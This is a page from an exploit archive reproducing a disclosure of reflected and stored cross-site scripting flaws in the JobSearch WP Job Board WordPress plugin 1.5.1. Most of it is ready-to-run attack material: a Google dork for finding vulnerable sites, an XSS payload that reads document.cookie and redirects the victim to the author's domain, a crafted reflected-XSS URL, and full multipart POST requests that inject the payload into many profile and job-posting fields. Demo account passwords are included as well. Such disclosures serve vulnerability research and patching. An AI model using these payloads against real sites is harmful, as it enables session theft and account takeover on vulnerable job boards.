Advertisement






JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities

CVE Category Price Severity
CVE-2020-35648 CWE-79 $1500 Critical
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2020-07-18
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070097

Below is a copy:

JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities
[+] Exploit Title: JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/plugins/wp-jobsearch/
[+] Date: 2020-07-03
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 1.5.1
[+] Software Link: https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected & Multiple Authenticated Persistent XSS vulnerabilities was discovered in the JobSearch plugin through 1.5.1 for WordPress.

[i] An Authenticated Persistent XSS @ Job Page will trigger on the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself.

[i] Demo account #1 (Candidate): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Demo account #2 (Employer): vladvector2 / DJKNFU#$&H#IUFD (login / password)

[i] Candidate Profile URL: https://eyecix.com/plugins/jobsearch/candidate/vladvector/

[i] Employer Profile URL: https://eyecix.com/plugins/jobsearch/employer/vladvector/

[i] Employer Job URL: https://eyecix.com/plugins/jobsearch/job/poc/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?location=[payload]

[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable fields: Phone, Dial Code, Job Title, Academic Level, Age, Salary, Gender, Industry, Full Address)

[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Phone, Dial Code, Founded Since, Member Title, Designation, Experience, Facebook URL, Google+ URL, Twitter URL, LinkedIn URL, Description, Full Address)

[x] Authenticated Persistent XSS -> Job Page (vulnerable fields: Offered Salary, Career Level, Experience, Gender, Industry, Qualifications, Job Description, Full Address)



### [ Payload: ]

[$] "--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://eyecix.com/plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B%20%22%3E

[!] GET /plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B%20%22%3E HTTP/1.1
Host: eyecix.com



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------27142012921130118151484572765
Content-Length: 6644
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"



-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_phone"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="dial_code"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_sector"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_bio"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="academic-level"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="Age"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="salary"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="gender"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="industry"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------27142012921130118151484572765--



### [ PoC Authenticated Persistent XSS -> Employer User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------321608141216835281602774802175
Content-Length: 6868
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_phone"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_website"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_sector"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_mm"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_yy"

1900
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_bio"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="founded-since"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------321608141216835281602774802175--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /plugins/jobsearch/post-new-jobs/ HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------35378657672420857749655614298
Content-Length: 5216
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/post-new-jobs/
Cookie: [cookies_here]

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_detail"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="application_deadline"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_sector"

12
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_type"

4
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="get_job_skills[]"

poc
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_type"

internal
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_url"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_email"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_max_salary"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="offered-salary"

31337"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="career-level"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="experience"

4-years"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="gender"

male"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="Industry"

graphics-designing"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="qualifications"

masters-degree"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------35378657672420857749655614298--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum